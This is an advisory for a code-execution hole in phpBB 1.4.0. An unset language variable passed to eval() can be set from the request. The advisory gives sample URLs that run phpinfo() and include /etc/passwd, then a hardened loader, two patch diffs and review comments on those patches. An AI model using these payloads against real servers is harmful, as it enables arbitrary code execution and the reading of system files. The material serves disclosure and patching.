COMMAND

    phpBB

SYSTEMS AFFECTED

    phpBB 1.4.0

PROBLEM

    This is regarding a phpBB security hole found some months ago by
    "UnderSpell". He discovered a way to run arbitrary code using phpBB.

    The approach was very simple. At a given point phpBB runs an eval,
    "eval($l_statsblock);". Since $l_statsblock is a language variable,
    we just have to find a way to set ourselves up with an invalid lang
    file: after login, go to user prefs and

        http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile=0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&user=&submit=Gravar+Prefer%EAncias

    By this time $l_statsblock is no longer initialized (the lang file
    that would define it is never included), so with register_globals
    a request parameter becomes its value and we can do funny stuff
    with it, like:

        http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo();

    or

        http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=include($teste);

    and so on ... we only checked the phpinfo one against the hack forum
    and the second against my production and staging boards.
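    As an added example (not phpBB's own code), here is a language loader that
    closes both gaps the advisory describes: the requested language is checked
    against the lang_*.php files actually installed, and the variable that is
    later eval()'d is initialised before the include. The helper names and the
    'english' fallback are assumptions for this example.

```php
<?php
// Added example, not phpBB code. Hardened replacement for the
// include('language/lang_'.$default_lang.'.'.$phpEx) pattern.

function available_languages($dir, $ext)
{
    // Build the allowlist from the filesystem, never from the request.
    $langs = array();
    foreach (glob($dir . '/lang_*.' . $ext) as $path) {
        if (preg_match('/^lang_([a-z_]+)\.' . preg_quote($ext, '/') . '$/',
                       basename($path), $m)) {
            $langs[] = $m[1];
        }
    }
    return $langs;
}

function language_file($requested, $dir, $ext, $fallback = 'english')
{
    // A value containing "../", a NUL byte or a name that is not installed
    // never reaches the include; it is replaced by the fallback (assumed
    // to exist as lang_english.php) or rejected outright.
    $allowed = available_languages($dir, $ext);
    $lang = in_array($requested, $allowed, true) ? $requested : $fallback;
    if (!in_array($lang, $allowed, true)) {
        return false;
    }
    return $dir . '/lang_' . $lang . '.' . $ext;
}

// Usage at file scope in auth.php, so the lang file's assignments land in
// the globals the rest of the board reads. $default_lang and $phpEx are
// the board's own variables from the advisory.
$l_statsblock = '';   // a request-supplied value can no longer survive
$langfile = language_file($default_lang, 'language', $phpEx);
if ($langfile === false) {
    die('Invalid Language');
}
include $langfile;
```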

SOLUTION

    You have two ways to fix this:

    1) Check whether the lang file exists before trying to include it

    --- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
    +++ phpBB/auth.php      Thu May 17 12:11:01 2001
    @@ -273,16 +273,19 @@
      // Include the appropriate language file.
      if(!strstr($PHP_SELF, "admin"))
      {
    -   include('language/lang_'.$default_lang.'.'.$phpEx);
    +   $langfile = 'language/lang_'.$default_lang.'.'.$phpEx;
      }
      else
      {
         if(strstr($PHP_SELF, "topicadmin")) {
    -     include('language/lang_'.$default_lang.'.'.$phpEx);
    -       } else {
    -     include('../language/lang_'.$default_lang.'.'.$phpEx);
    -       }
    +     $langfile ='language/lang_'.$default_lang.'.'.$phpEx;
    +        } else {
    +                $langfile = '../language/lang_'.$default_lang.'.'.$phpEx;
    +        }
      }
    +
    + if ( ! file_exists($langfile) ) { die("Invalid Language");}
    + else { include($langfile); }
    
      // See if translated pictures are available..
      $header_image = get_translated_file($header_image);
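    Review bot: the new "if ( ! file_exists($langfile) ) { die("Invalid Language");}" line only confirms that some file exists at the computed path; $default_lang still flows into that path unvalidated, so the check does not enforce that an installed language name was chosen. Validate $default_lang against the installed lang_*.php names (or at least reject path separators) before building $langfile. Minor: the "+" lines inside the else branch use indentation that differs from the surrounding code.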

    2) Initialize $l_statsblock before trying to include (preferred)

    --- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
    +++ phpBB/auth.php      Thu May 17 11:39:33 2001
    @@ -269,6 +269,7 @@
      // set vars for all scripts
      $now_time = time();
      $last_visit = $temptime;
    +$l_statsblock = '';
    
      // Include the appropriate language file.
      if(!strstr($PHP_SELF, "admin"))
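    Review bot: "$l_statsblock = '';" neutralises a request-supplied value for that one variable only; eval($l_statsblock) stays in place, and every other variable the missing language file would have defined is left in the same state, so either initialise all of them here or combine this hunk with the existence check from fix 1 so the include cannot be skipped. Style: the added line lacks the single leading space the neighbouring statements have.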